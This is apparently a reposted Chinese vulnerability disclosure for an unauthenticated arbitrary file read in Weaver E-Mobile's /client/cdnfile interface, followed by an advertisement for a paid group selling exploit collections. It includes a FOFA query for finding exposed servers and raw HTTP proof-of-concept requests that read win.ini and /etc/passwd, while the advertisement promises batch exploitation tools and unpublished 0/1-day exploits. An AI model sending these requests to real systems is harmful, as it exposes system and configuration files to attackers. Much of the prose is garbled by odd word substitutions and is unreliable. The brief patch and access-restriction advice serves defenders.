泛微E-Mobile client cdnfile接口处存在任意文件读取漏洞
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">今日星球新增漏洞9个(优惠券二维码已更新,<span style="color: black;">日前</span>仅剩2个余额)</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">灵当CRM marketing index.php接囗存在SQL注入漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">魅思-视频管理系统 getOrderStatus接囗处存在SQL注入漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">商混ERP系统 TaskCarToQueue.aspx接囗存在SQL注入漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">数字通云平台智慧政务 workflow query index接囗存在SQL注入漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">万能小程序运营管理系统 requestPost接囗存在任意文件读取漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">用友U8 CRM config relobjreportlist.php接囗存在SQL注入漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">誉龙视音频综合管理平台 RelMedia FindByld接囗存在SQL注入漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">誉龙视音频综合管理平台 Third TimeSyn接口存在远程命令执行漏洞</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;"><strong style="color: blue;"><span style="color: black;">泛微E-Mobile client cdnfile接囗存在任意文件读取漏洞</span></strong></span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCrkfN0dgxAMV15pAqvWOWTVdOdvUY6tNr1ORhHH939NZuJMTc5R6Cd18U34utOO1Q8pHgXtlzb3sg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x01 <span style="color: black;">制品</span>简介</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">泛微E-Mobile是一款由泛微网络科技股份有限<span style="color: black;">机构</span><span style="color: black;">研发</span>的移动办公<span style="color: black;">制品</span>,该<span style="color: black;">制品</span>专门为手机、平板电脑等移动终端用户设计,旨在<span style="color: black;">供给</span><span style="color: black;">方便</span>、<span style="color: black;">有效</span>的移动办公体验。适用于企业高管和有移动办公<span style="color: black;">需要</span>的业务部<span style="color: black;">关联</span>员工<span style="color: black;">运用</span>,<span style="color: black;">尤其</span>适合于已有内部OA系统的大中型企业<span style="color: black;">公司</span>,尤其是企业或<span style="color: black;">分部</span>有较多的分支<span style="color: black;">公司</span>。近期推出的鸿蒙原生应用基线版本就实现了跨设备联动、应用接续等创新功能,为用户带来更加<span style="color: black;">有效</span>、<span style="color: black;">方便</span>的移动办公体验。<span style="color: black;">将来</span>,泛微E-Mobile将继续引领数字化办公浪潮,为<span style="color: black;">更加多</span>企业<span style="color: black;">供给</span><span style="color: black;">优秀</span>的移动办公<span style="color: black;">处理</span><span style="color: black;">方法</span>。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x02 漏洞概述</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">泛微E-Mobile cientcdnle 接口存在任意文件读取漏洞,未经身份验证攻击者可<span style="color: black;">经过</span>该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,<span style="color: black;">引起</span>网站<span style="color: black;">处在</span>极度不安全状态。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x03 复现环境</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">FOFA:</p><span style="color: black;"><span style="color: black;">app</span>=<span style="color: black;">"泛微-EMobile"</span></span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCqYe7URrwV9hcOwuiaMdnvp96fKEJuXFBKpX76qvXabKNVUPtIcLRibFqB2XOA32doxmz9ckoR0rUJw/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x0</span></strong><strong style="color: blue;"><span style="color: black;">4</span></strong><strong style="color: blue;"><span style="color: black;"> 漏洞复现</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows-PoC</p><span style="color: black;"><span style="color: black;">GET</span> <span style="color: black;">/client/cdnfile/1C/Windows/win.ini?windows</span> HTTP/1.1</span><span style="color: black;"><span style="color: black;">Host</span>: </span><span style="color: black;"><span style="color: black;">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0</span><span style="color: black;"><span style="color: black;">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><span style="color: black;"><span style="color: black;">Accept-Encoding</span>: gzip, deflate</span><span style="color: black;"><span style="color: black;">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><span style="color: black;"><span style="color: black;">Connection</span>: close</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCqYe7URrwV9hcOwuiaMdnvp98Adllcexws3W3hc6HqPsEcibfWicQ1cBJzqqL1KNtSjNlKibLmYZ8kzFQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Linux-POC</p><span style="color: black;"><span style="color: black;">GET</span> <span style="color: black;">/client/cdnfile/C/etc/passwd?linux</span>HTTP/1.1</span><span style="color: black;"><span style="color: black;">Host</span>: </span><span style="color: black;"><span style="color: black;">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0</span><span style="color: black;"><span style="color: black;">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><span style="color: black;"><span style="color: black;">Accept-Encoding</span>: gzip, deflate</span><span style="color: black;"><span style="color: black;">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><span style="color: black;"><span style="color: black;">Connection</span>: close</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCqYe7URrwV9hcOwuiaMdnvp9XlOwfRWYUHTBX8lbmddOciczAx5yymYv7aOcN8t8MtnpVBp7ibCLMOjg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x05 修复<span style="color: black;">意见</span></span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">临时缓解<span style="color: black;">方法</span></span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">接口设置<span style="color: black;">拜访</span>权限或限制<span style="color: black;">拜访</span><span style="color: black;">源自</span><span style="color: black;">位置</span>,如非必要,不要将系统开放在互联网上。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">升级修复<span style="color: black;">方法</span></span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">日前</span>官方已发布安全补丁,<span style="color: black;">意见</span>受影响用户尽快升级至安全版本</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://www.weaver.com.cn</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x06 星球介绍</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">本星球<span style="color: black;">保持</span><span style="color: black;">每日</span>分享<span style="color: black;">有些</span>攻防知识,<span style="color: black;">包含</span>攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、<span style="color: black;">处理</span><span style="color: black;">方法</span>、安全运营、安全体系、安全培训和安全标准等文库;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">本星主已加入几十余个付费星球,<span style="color: black;">定时</span>汇聚高质量资料及工具进行星球分享。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">0x07 星球服务</span></strong></p><span style="color: black;">1.<span style="color: black;">咱们</span>将<span style="color: black;">保证</span>会员<span style="color: black;">能够</span>接触到至少365个独特的漏洞利用程序库和相应的批量利用工具,<span style="color: black;">保证</span>您能够应对各类安全挑战;</span><span style="color: black;">2.Cmd5解密服务,<span style="color: black;">持续</span>更新的多种漏洞利用工具以及安全渗透工具和文档资源将与您共享,<span style="color: black;">帮忙</span>您保持领先地位;</span><span style="color: black;">3.<span style="color: black;">把握</span>独家的漏洞数据库情报(超过2000个Poc),<span style="color: black;">包含</span><span style="color: black;">定时</span>更新的未公开0/1day漏洞信息,<span style="color: black;">保证</span>您在信息安全领域保持一步之遥。</span><span style="color: black;"><span style="color: black;">加入<span style="color: black;">花费</span>原价为50元,前十名加入前可领取20元优惠券。机会难得,相当于结交<span style="color: black;">伴侣</span>的价格!<span style="color: black;">同期</span>加入之后需要<span style="color: black;">那些</span>漏洞<span style="color: black;">能够</span>跟星主提,这边随时给您<span style="color: black;">供给</span>相应的<span style="color: black;">帮忙</span>。<span style="color: black;">重视</span>,一旦成员数目达到10人,入会<span style="color: black;">花费</span>将<span style="color: black;">调节</span>至80元。<span style="color: black;">咱们</span>承诺圈子的内容将保持每日更新,<span style="color: black;">保证</span>您获取最新的信息安全动态和专业知识。</span></span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCoj2GeyBYEQxhlt8LdU4F9cpsEhZXHggEBR97Y02IQIaySa53uYz7DG6iccPIcSkDLVSrLa7PeW3gQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_jpg/62ZALuShxCo7SclQ2MuBamDMsaq71l1icNIclLhltnicNqtuF3Yu7P8IP6eJ0PaTUMLnB8qolkHrVTwuEPVsO3OQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">星主<span style="color: black;">部分</span>POC</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCpLg4osXQryM3UDyQVJghSqZNHmWUSVyt3Nkbic9WibKXuWqSR3OIDSoeJ0U7rD6LVxkHibzWREZbl4A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCpLg4osXQryM3UDyQVJghSqScInHvU8B67UkhzNURtJz2k7iaibrwTnlU41nHYP4hBmNvxZGVw0yzqA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCpLg4osXQryM3UDyQVJghSq9ZM0ib0ySJlUpRnhWH4WEKMvkUicPcADfD6CzibOGtVCUxIPIUfuApVfw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCpLg4osXQryM3UDyQVJghSqZNHmWUSVyt3Nkbic9WibKXuWqSR3OIDSoeJ0U7rD6LVxkHibzWREZbl4A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCpLg4osXQryM3UDyQVJghSqScInHvU8B67UkhzNURtJz2k7iaibrwTnlU41nHYP4hBmNvxZGVw0yzqA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/62ZALuShxCpLg4osXQryM3UDyQVJghSq9ZM0ib0ySJlUpRnhWH4WEKMvkUicPcADfD6CzibOGtVCUxIPIUfuApVfw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
论坛的成果是显著的,但我们不能因为成绩而沾沾自喜。 我赞同你的看法,你的智慧让人佩服,谢谢分享。
页:
[1]